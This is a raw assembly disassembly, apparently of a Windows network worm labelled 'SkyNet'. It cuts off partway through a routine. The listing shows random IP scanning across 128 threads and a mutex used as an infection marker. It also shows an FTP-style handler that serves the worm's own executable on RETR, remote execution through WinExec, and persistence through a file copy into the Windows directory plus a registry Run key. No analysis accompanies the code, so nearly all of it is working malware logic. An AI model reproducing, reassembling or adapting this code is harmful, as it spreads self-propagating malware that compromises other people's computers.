lea eax, [ebp+var_60]
push [ebp+var_30]
shl edi, 8
push [ebp+var_34]
add edi, [ebp+var_14]
push [ebp+var_38]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call dword_4050F0 ; wsprintfA
add esp, 18h
push 0
push off_4068E0
call sub_402300
pop ecx
push eax
push off_4068E0
jmp loc_401E32
; ---------------------------------------------------------------------------
loc_401CF5: ; CODE XREF: sub_401B59+D5�j
lea eax, [ebp+var_4E4]
push offset aRetr ; "RETR"
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz loc_401E37
push 0
push off_4068E4
call sub_402300
pop ecx
push eax
push off_4068E4
push ebx
call esi ; dword_405118
lea eax, [ebp+var_60]
push eax
call sub_4011D5
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_401E14
push 10h
lea eax, [ebp+var_28]
push 0
push eax
call sub_4022A0
add esp, 0Ch
mov [ebp+var_28], 2
push edi
call dword_40511C
push 0
push 1
push 2
mov [ebp+var_26], ax
mov [ebp+var_24], ebx
call dword_405120
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+var_C], ebx
jz loc_401E14
lea eax, [ebp+var_28]
push 10h
push eax
push ebx
call dword_405124
cmp eax, 0FFFFFFFFh
jnz short loc_401D95
push ebx
call dword_405128
jmp short loc_401E14
; ---------------------------------------------------------------------------
loc_401D95: ; CODE XREF: sub_401B59+231�j
lea eax, [ebp+var_8E4]
push 400h
push eax
push 0
call dword_405038 ; GetModuleFileNameA
lea eax, [ebp+var_8E4]
push 0
push eax
call dword_405034 ; _lopen
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz short loc_401E14
lea eax, [ebp+var_2]
push offset dword_4070C8
push eax
call sub_402810
mov ebx, dword_405030
pop ecx
pop ecx
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
loc_401DDF: ; CODE XREF: sub_401B59+2A6�j
call ebx ; dword_405030
cmp eax, 1
jnz short loc_401E01
and [ebp+var_1], 0
push 0
push eax
lea eax, [ebp+var_2]
push eax
push [ebp+var_C]
call esi ; dword_405118
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
jmp short loc_401DDF
; ---------------------------------------------------------------------------
loc_401E01: ; CODE XREF: sub_401B59+28B�j
push [ebp+var_8]
call dword_40501C ; _lclose
lea eax, [ebp+var_60]
push eax
call sub_401210
pop ecx
loc_401E14: ; CODE XREF: sub_401B59+1DD�j
; sub_401B59+21B�j ...
push [ebp+var_C]
call dword_405128
push 0
push off_4068DC
call sub_402300
pop ecx
push eax
push off_4068DC
loc_401E32: ; CODE XREF: sub_401B59+197�j
push [ebp+arg_0]
jmp short loc_401E6D
; ---------------------------------------------------------------------------
loc_401E37: ; CODE XREF: sub_401B59+1B1�j
lea eax, [ebp+var_4E4]
push offset aQuit ; "QUIT"
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz short loc_401E57
push ebx
call dword_405128
jmp short loc_401E6F
; ---------------------------------------------------------------------------
loc_401E57: ; CODE XREF: sub_401B59+2F3�j
push 0
push off_4068DC
call sub_402300
pop ecx
push eax
push off_4068DC
loc_401E6C: ; CODE XREF: sub_401B59+8A�j
; sub_401B59+BB�j
push ebx
loc_401E6D: ; CODE XREF: sub_401B59+2DC�j
call esi ; dword_405118
loc_401E6F: ; CODE XREF: sub_401B59+2FC�j
cmp [ebp+var_10], 0
jg loc_401B94
push [ebp+arg_0]
call dword_405128
pop edi
pop esi
loc_401E84: ; CODE XREF: sub_401B59+10�j
xor eax, eax
pop ebx
leave
retn 4
sub_401B59 endp
; =============== S U B R O U T I N E =======================================
sub_401E8B proc near ; CODE XREF: sub_401B59+119�p
; sub_401B59+129�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
loc_401E93: ; CODE XREF: sub_401E8B+13�j
mov al, [esi]
cmp al, 20h
jz short loc_401E9D
cmp al, 9
jnz short loc_401EA0
loc_401E9D: ; CODE XREF: sub_401E8B+C�j
inc esi
jmp short loc_401E93
; ---------------------------------------------------------------------------
loc_401EA0: ; CODE XREF: sub_401E8B+10�j
; sub_401E8B+2E�j
movsx eax, byte ptr [esi]
push eax
call sub_402900
test eax, eax
pop ecx
jz short loc_401EBB
movsx ecx, byte ptr [esi]
lea eax, [edi+edi*4]
inc esi
lea edi, [ecx+eax*2-30h]
jmp short loc_401EA0
; ---------------------------------------------------------------------------
loc_401EBB: ; CODE XREF: sub_401E8B+21�j
mov eax, edi
pop edi
pop esi
retn
sub_401E8B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401EC0 proc near ; DATA XREF: sub_4020D9+6E�o
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_405120
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_401EE4
loc_401EDC: ; CODE XREF: sub_401EC0+63�j
pop edi
xor eax, eax
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_401EE4: ; CODE XREF: sub_401EC0+1A�j
push 3FFh
mov [ebp+var_14], 2
call dword_40511C
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
mov [ebp+var_10], esi
call dword_405108
cmp eax, 0FFFFFFFFh
jz short loc_401F1C
push 5
push edi
call dword_40510C
cmp eax, 0FFFFFFFFh
jnz short loc_401F25
loc_401F1C: ; CODE XREF: sub_401EC0+4C�j
push edi
call dword_405128
jmp short loc_401EDC
; ---------------------------------------------------------------------------
loc_401F25: ; CODE XREF: sub_401EC0+5A�j
; sub_401EC0+89�j
push esi
push esi
push edi
call dword_405110
lea ecx, [ebp+var_4]
push ecx
push esi
push eax
push offset sub_401B59
push esi
push esi
call dword_40503C ; CreateThread
push 19h
call dword_40502C ; Sleep
jmp short loc_401F25
sub_401EC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401F4B proc near ; DATA XREF: sub_4020D9+82�o
var_45C = dword ptr -45Ch
var_458 = dword ptr -458h
var_454 = byte ptr -454h
var_450 = byte ptr -450h
var_438 = byte ptr -438h
var_400 = byte ptr -400h
sub esp, 45Ch
push ebx
push ebp
push esi
push edi
push 0FFFFFFFFh
call dword_405048 ; GetCurrentThread
push eax
call dword_405044 ; SetThreadPriority
loc_401F64: ; CODE XREF: sub_401F4B+37�j
xor esi, esi
lea eax, [esp+46Ch+var_458]
push esi
push eax
mov [esp+474h+var_458], esi
call dword_4050FC
cmp eax, esi
jnz short loc_401F84
push 19h
call dword_40502C ; Sleep
jmp short loc_401F64
; ---------------------------------------------------------------------------
loc_401F84: ; CODE XREF: sub_401F4B+2D�j
lea eax, [esp+46Ch+var_438]
push eax
call sub_4010D2
pop ecx
lea eax, [esp+46Ch+var_438]
push eax
call dword_405134
movsx ebp, al
movsx eax, ah
mov [esp+46Ch+var_45C], eax
cmp ebp, esi
mov eax, 100h
jge short loc_401FAF
add ebp, eax
loc_401FAF: ; CODE XREF: sub_401F4B+60�j
cmp [esp+46Ch+var_45C], esi
jge short loc_401FB9
add [esp+46Ch+var_45C], eax
loc_401FB9: ; CODE XREF: sub_401F4B+68�j
mov edi, dword_4050F0
mov esi, 0FFh
mov ebx, offset aI_I_I_I ; "%i.%i.%i.%i"
loc_401FC9: ; CODE XREF: sub_401F4B+189�j
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_402029
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_40200C
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
jmp short loc_402026
; ---------------------------------------------------------------------------
loc_40200C: ; CODE XREF: sub_401F4B+9C�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
push [esp+474h+var_45C]
loc_402026: ; CODE XREF: sub_401F4B+BF�j
push ebp
jmp short loc_402055
; ---------------------------------------------------------------------------
loc_402029: ; CODE XREF: sub_401F4B+8C�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
loc_402055: ; CODE XREF: sub_401F4B+DC�j
lea eax, [esp+47Ch+var_454]
push ebx
push eax
call edi ; dword_4050F0
add esp, 18h
lea eax, [esp+468h+var_450]
push 3E8h
push eax
call dword_405134
push eax
call sub_401B1B
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4020CC
lea eax, [esp+46Ch+var_454]
push eax
call sub_401153
cmp al, 1
pop ecx
jnz short loc_4020CC
lea eax, [esp+46Ch+var_400]
push 400h
push eax
push 0
call dword_405038 ; GetModuleFileNameA
lea eax, [esp+46Ch+var_400]
push offset asc_406A84 ; " "
push eax
call sub_402820
lea eax, [esp+474h+var_454]
push eax
lea eax, [esp+478h+var_400]
push eax
call sub_402820
add esp, 10h
lea eax, [esp+46Ch+var_400]
push 0
push eax
call dword_405040 ; WinExec
loc_4020CC: ; CODE XREF: sub_401F4B+130�j
; sub_401F4B+13F�j
push 19h
call dword_40502C ; Sleep
jmp loc_401FC9
sub_401F4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020D9 proc near ; CODE XREF: .text:004029F7�p
var_14 = dword ptr -14h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
call dword_405054 ; GetTickCount
push eax
call sub_40101E
call sub_401028
push [ebp+arg_8]
call sub_402300
pop ecx
test eax, eax
pop ecx
jbe short loc_40210D
push [ebp+arg_8]
call sub_401A69
pop ecx
push 1
pop eax
locret_402109: ; CODE XREF: sub_4020D9+5F�j
leave
retn 10h
; ---------------------------------------------------------------------------
loc_40210D: ; CODE XREF: sub_4020D9+22�j
push esi
push edi
push 1
call sub_40219B
xor esi, esi
mov [esp+14h+var_14], offset aSkynetnotice ; "SkynetNotice"
push esi
push esi
call dword_405050 ; CreateMutexA
call dword_40504C ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_40213A
pop edi
xor eax, eax
pop esi
jmp short locret_402109
; ---------------------------------------------------------------------------
loc_40213A: ; CODE XREF: sub_4020D9+59�j
mov edi, dword_40503C
lea eax, [ebp+var_4]
push ebx
push eax
push esi
push esi
push offset sub_401EC0
push esi
push esi
call edi ; dword_40503C
mov ebx, 80h
loc_402155: ; CODE XREF: sub_4020D9+8C�j
lea eax, [ebp+var_8]
push eax
push esi
push esi
push offset sub_401F4B
push esi
push esi
call edi ; dword_40503C
dec ebx
jnz short loc_402155
xor edi, edi
pop ebx
loc_40216A: ; CODE XREF: sub_4020D9+AA�j
; sub_4020D9+C0�j
push esi
call dword_405008
push 3E8h
call dword_40502C ; Sleep
inc edi
cmp edi, 1C20h
jle short loc_40216A
push esi
push offset aSkynet ; "SkyNet"
push offset a1_YourComputer ; "1. Your computer is affected by the MS0"...
push esi
xor edi, edi
call dword_4050F4 ; MessageBoxA
jmp short loc_40216A
sub_4020D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40219B proc near ; CODE XREF: sub_4020D9+38�p
var_824 = byte ptr -824h
var_425 = byte ptr -425h
var_424 = byte ptr -424h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 824h
push esi
mov esi, 400h
push edi
lea eax, [ebp+var_824]
push esi
push eax
push 0
call dword_405038 ; GetModuleFileNameA
lea eax, [ebp+var_424]
push esi
push eax
call dword_40505C ; GetWindowsDirectoryA
lea eax, [ebp+var_424]
push eax
call sub_402300
cmp [ebp+eax+var_425], 5Ch
pop ecx
jz short loc_4021F3
lea eax, [ebp+var_424]
push offset asc_406C50 ; "\\"
push eax
call sub_402820
pop ecx
pop ecx
loc_4021F3: ; CODE XREF: sub_40219B+43�j
push off_4068C8
lea eax, [ebp+var_424]
push eax
call sub_402820
cmp [ebp+arg_0], 0
pop ecx
pop ecx
jz short loc_402223
lea eax, [ebp+var_424]
push 0
push eax
lea eax, [ebp+var_824]
push eax
call dword_405058 ; CopyFileA
loc_402223: ; CODE XREF: sub_40219B+70�j
lea eax, [ebp+var_4]
mov esi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push eax
push esi
push 80000002h
call dword_40500C
lea eax, [ebp+var_424]
push eax
call sub_402300
pop ecx
push eax
lea eax, [ebp+var_424]
push eax
push 1
push 0
push off_4068C8
push [ebp+var_4]
call dword_405004
push [ebp+var_4]
call dword_405000
push offset aSsgrate_exe ; "ssgrate.exe"
mov edi, 80000001h
push esi
push edi
call sub_401AED
push offset aDrvsys_exe ; "drvsys.exe"
push esi
push edi
call sub_401AED
push offset aDrvddll_exe ; "Drvddll_exe"
push esi
push edi
call sub_401AED
add esp, 24h
pop edi
pop esi
leave
retn
sub_40219B endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4022A0 proc near ; CODE XREF: sub_401153+10�p
; sub_401153+40�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_4022F3
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4022E7
neg ecx
and ecx, 3
jz short loc_4022C9
sub edx, ecx
loc_4022C3: ; CODE XREF: sub_4022A0+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_4022C3
loc_4022C9: ; CODE XREF: sub_4022A0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4022E7
rep stosd
test edx, edx
jz short loc_4022ED
loc_4022E7: ; CODE XREF: sub_4022A0+18�j
; sub_4022A0+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_4022E7
loc_4022ED: ; CODE XREF: sub_4022A0+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4022F3: ; CODE XREF: sub_4022A0+A�j
mov eax, [esp+arg_0]
retn
sub_4022A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402300 proc near ; CODE XREF: sub_401210+2C�p
; sub_401210+46�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_402320
loc_40230C: ; CODE XREF: sub_402300+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_402353
test ecx, 3
jnz short loc_40230C
add eax, 0
loc_402320: ; CODE XREF: sub_402300+A�j
; sub_402300+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_402320
mov eax, [ecx-4]
test al, al
jz short loc_402371
test ah, ah
jz short loc_402367
test eax, 0FF0000h
jz short loc_40235D
test eax, 0FF000000h
jz short loc_402353
jmp short loc_402320
; ---------------------------------------------------------------------------
loc_402353: ; CODE XREF: sub_402300+11�j
; sub_402300+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40235D: ; CODE XREF: sub_402300+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402367: ; CODE XREF: sub_402300+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402371: ; CODE XREF: sub_402300+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_402300 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402380 proc near ; CODE XREF: sub_40137D+59�p
; sub_40137D+78�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4023A0
cmp edi, eax
jb loc_402518
loc_4023A0: ; CODE XREF: sub_402380+16�j
test edi, 3
jnz short loc_4023BC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4023DC
rep movsd
jmp off_4024C8[edx*4]
; ---------------------------------------------------------------------------
loc_4023BC: ; CODE XREF: sub_402380+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4023D4
and eax, 3
add ecx, eax
jmp dword ptr loc_4023DC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4023D4: ; CODE XREF: sub_402380+46�j
jmp dword ptr loc_4024D8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4023DC: ; CODE XREF: sub_402380+31�j
; sub_402380+8E�j ...
jmp off_40245C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4023F0
dd offset loc_40241C
dd offset loc_402440
; ---------------------------------------------------------------------------
loc_4023F0: ; DATA XREF: sub_402380+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4023DC
rep movsd
jmp off_4024C8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40241C: ; DATA XREF: sub_402380+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4023DC
rep movsd
jmp off_4024C8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_402440: ; DATA XREF: sub_402380+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4023DC
rep movsd
jmp off_4024C8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40245C dd offset loc_4024BF ; DATA XREF: sub_402380:loc_4023DC�r
dd offset loc_4024AC
dd offset loc_4024A4
dd offset loc_40249C
dd offset loc_402494
dd offset loc_40248C
dd offset loc_402484
dd offset loc_40247C
; ---------------------------------------------------------------------------
loc_40247C: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_402484: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_40248C: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_402494: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_40249C: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4024A4: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4024AC: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4024BF: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380:off_40245C�o
jmp off_4024C8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4024C8 dd offset loc_4024D8 ; DATA XREF: sub_402380+35�r
; sub_402380+92�r ...
dd offset loc_4024E0
dd offset loc_4024EC
dd offset loc_402500
; ---------------------------------------------------------------------------
loc_4024D8: ; CODE XREF: sub_402380+35�j
; sub_402380+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4024E0: ; CODE XREF: sub_402380+35�j
; sub_402380+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4024EC: ; CODE XREF: sub_402380+35�j
; sub_402380+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_402500: ; CODE XREF: sub_402380+35�j
; sub_402380+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402518: ; CODE XREF: sub_402380+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_40254C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_402540
std
rep movsd
cld
jmp off_402660[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_402540: ; CODE XREF: sub_402380+1B1�j
; sub_402380+208�j ...
neg ecx
jmp off_402610[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40254C: ; CODE XREF: sub_402380+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_402564
and eax, 3
sub ecx, eax
jmp dword ptr loc_402564+4[eax*4]
; ---------------------------------------------------------------------------
loc_402564: ; CODE XREF: sub_402380+1D6�j
; DATA XREF: sub_402380+1DD�r
jmp off_402660[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_402577+1
; ---------------------------------------------------------------------------
cwde
and eax, 25C00040h
inc eax
loc_402577: ; DATA XREF: sub_402380+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_402540
std
rep movsd
cld
jmp off_402660[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_402540
std
rep movsd
cld
jmp off_402660[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_402540
std
rep movsd
cld
jmp off_402660[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_402614
dd offset loc_40261C
dd offset loc_402624
dd offset loc_40262C
dd offset loc_402634
dd offset loc_40263C
dd offset loc_402644
off_402610 dd offset loc_402657 ; DATA XREF: sub_402380+1C2�r
; ---------------------------------------------------------------------------
loc_402614: ; DATA XREF: sub_402380+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_40261C: ; DATA XREF: sub_402380+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_402624: ; DATA XREF: sub_402380+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_40262C: ; DATA XREF: sub_402380+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_402634: ; DATA XREF: sub_402380+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40263C: ; DATA XREF: sub_402380+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_402644: ; DATA XREF: sub_402380+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_402657: ; CODE XREF: sub_402380+1C2�j
; DATA XREF: sub_402380:off_402610�o
jmp off_402660[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_402660 dd offset loc_402670 ; DATA XREF: sub_402380+1B7�r
; sub_402380:loc_402564�r ...
dd offset loc_402678
dd offset loc_402688
dd offset loc_40269C
; ---------------------------------------------------------------------------
loc_402670: ; CODE XREF: sub_402380+1B7�j
; sub_402380:loc_402564�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402678: ; CODE XREF: sub_402380+1B7�j
; sub_402380:loc_402564�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402688: ; CODE XREF: sub_402380+1B7�j
; sub_402380:loc_402564�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40269C: ; CODE XREF: sub_402380+1B7�j
; sub_402380:loc_402564�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_402380 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4026C0 proc near ; CODE XREF: sub_401583+8�p
; sub_40380C+DF�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_4026E0
loc_4026CC: ; CODE XREF: sub_4026C0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4026CC
loc_4026E0: ; CODE XREF: sub_4026C0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4026C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4026F0 proc near ; CODE XREF: sub_401A69+2D�p
; sub_401A69+50�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_40276A
mov dh, [ecx+1]
test dh, dh
jz short loc_402757
loc_402708: ; CODE XREF: sub_4026F0+52�j
; sub_4026F0+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_40272A
test al, al
jz short loc_402724
loc_402719: ; CODE XREF: sub_4026F0+32�j
mov al, [esi]
inc esi
loc_40271C: ; CODE XREF: sub_4026F0+3F�j
cmp al, dl
jz short loc_40272A
test al, al
jnz short loc_402719
loc_402724: ; CODE XREF: sub_4026F0+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40272A: ; CODE XREF: sub_4026F0+23�j
; sub_4026F0+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_40271C
lea edi, [esi-1]
loc_402734: ; CODE XREF: sub_4026F0+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_402763
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_402708
mov al, [ecx+3]
test al, al
jz short loc_402763
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_402734
jmp short loc_402708
; ---------------------------------------------------------------------------
loc_402757: ; CODE XREF: sub_4026F0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp sub_402A86
; ---------------------------------------------------------------------------
loc_402763: ; CODE XREF: sub_4026F0+49�j
; sub_4026F0+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_40276A: ; CODE XREF: sub_4026F0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_4026F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402770 proc near ; CODE XREF: sub_401B59+103�p
; sub_401B59+14C�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_402789: ; CODE XREF: sub_402770+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_402789
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_4027B1
mov edx, dword_4070CC
loc_4027B1: ; CODE XREF: sub_402770+39�j
; sub_402770+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_4027D1
test al, al
jz short loc_4027D1
inc edx
jmp short loc_4027B1
; ---------------------------------------------------------------------------
loc_4027D1: ; CODE XREF: sub_402770+58�j
; sub_402770+5C�j
mov ebx, edx
loc_4027D3: ; CODE XREF: sub_402770+81�j
mov al, [edx]
test al, al
